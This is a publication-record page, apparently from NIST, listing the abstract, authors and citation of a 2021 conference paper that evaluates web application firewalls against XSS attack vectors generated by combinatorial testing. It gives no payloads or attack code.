Skip to main content
U.S. flag

An official website of the United States government

Official websites use .gov
A .gov website belongs to an official government organization in the United States.

Secure .gov websites use HTTPS
A lock ( ) or https:// means you’ve safely connected to the .gov website. Share sensitive information only on official, secure websites.

Combinatorially XSSing Web Application Firewalls

Published

Author(s)

Bernhard Garn, Daniel S. Lang, Manuel Leithner, D. Richard Kuhn, Raghu N. Kacker, Dimitris Simos

Abstract

Cross-Site scripting (XSS) is a common class of vulnerabilities in the domain of web applications. As it remains prevalent despite continued efforts by practitioners and researchers, site operators often seek to protect their assets using web application firewalls (WAFs). These systems employ filtering mechanisms to intercept and reject requests that may be suitable to exploit XSS flaws and related vulnerabilities such as SQL injections. However, they generally do not offer complete protection and can often be bypassed using specifically crafted exploits. In this work, we evaluate the effectiveness of WAFs to detect XSS exploits. We develop an attack grammar and use a combinatorial testing approach to generate attack vectors. We compare our vectors with conventional counterparts and their ability to bypass different WAFs. Our results show that the vectors generated with combinatorial testing perform equal or better in almost all cases. They further confirm that most of the rule sets evaluated in this work can be bypassed by at least one of these crafted inputs.
Proceedings Title
2021 IEEE International Conference on Software Testing, Verification and Validation Workshops (ICSTW)
Conference Dates
April 12-16, 2021
Conference Location
Porto de Galinhas, BR
Conference Title
IEEE International Conference on Software Testing, Verification and Validation (ICST)

Keywords

combinatorial testing, security testing, web application, xss, web application firewall

Citation

Garn, B. , Lang, D. , Leithner, M. , Kuhn, D. , Kacker, R. and Simos, D. (2021), Combinatorially XSSing Web Application Firewalls, 2021 IEEE International Conference on Software Testing, Verification and Validation Workshops (ICSTW), Porto de Galinhas, BR, [online], https://doi.org/10.1109/ICSTW52544.2021.00026, https://tsapps.nist.gov/publication/get_pdf.cfm?pub_id=931831 (Accessed January 21, 2022)
Created April 12, 2021, Updated December 16, 2021